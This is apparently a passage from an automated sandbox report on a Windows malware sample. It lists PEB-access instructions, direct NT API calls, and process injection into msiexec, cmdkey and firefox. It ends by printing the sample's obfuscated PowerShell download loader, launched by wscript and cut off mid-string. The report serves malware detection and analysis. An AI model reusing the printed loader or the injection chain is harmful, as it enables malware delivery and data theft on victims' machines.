          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2216E609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF626 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221C5636 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22126620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22128620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2210E627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2210C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22122674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212A660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212A660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22129660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22129660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221B866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221B866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2217368C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F4690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F4690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221266B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220ED6AA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220ED6AA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212C6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220E76B2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220E76B2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220E76B2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220FB6C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212A6C7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221B16CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221AF6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221216CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2216E6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221706F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221706F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221AD6F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2211D6E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2211D6E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221836EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221236EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22120710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F7703 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F5702 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F5702 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212F71F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212F71F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212C700 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F0710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221CB73C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2216C730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22125734 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212273C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F3720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2210F720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2210F720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2210F720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221B972B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212C720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212C720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221AF72E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F973A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F973A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220E9730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220E9730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22174755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22132750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22132750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22103740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22103740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22103740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221C3749 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F0750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212674D mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2212674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_22100770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EB765 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F8770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221AF78A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220F07AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2211D7B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_221C37B6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_220EF7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2217F7AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_2217F7AF mov eax, dword ptr fs:[00000030h]

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
          Source: Yara match; File source: amsi64_7156.amsi.csv, type: OTHER
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtOpenSection: Direct from: 0x76EF2E0C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtCreateFile: Direct from: 0x76EF2FEC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtOpenFile: Direct from: 0x76EF2DCC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtCreateMutant: Direct from: 0x76EF35CC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtResumeThread: Direct from: 0x76EF36AC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtReadFile: Direct from: 0x76EF2ADC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtDelayExecution: Direct from: 0x76EF2DDC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtResumeThread: Direct from: 0x76EF2FBC
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtCreateUserProcess: Direct from: 0x76EF371C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtSetInformationThread: Direct from: 0x76EE63F9
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtClose: Direct from: 0x76EF2B6C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; NtCreateKey: Direct from: 0x76EF2C6C
          Source: C:\Windows\SysWOW64\msiexec.exe; Section loaded: NULL target: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe protection: execute and read and write
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe; Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: NULL target: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe protection: read write
          Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: NULL target: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\cmdkey.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmdkey.exe; Thread register set: target process: 7084
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4030000
          Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
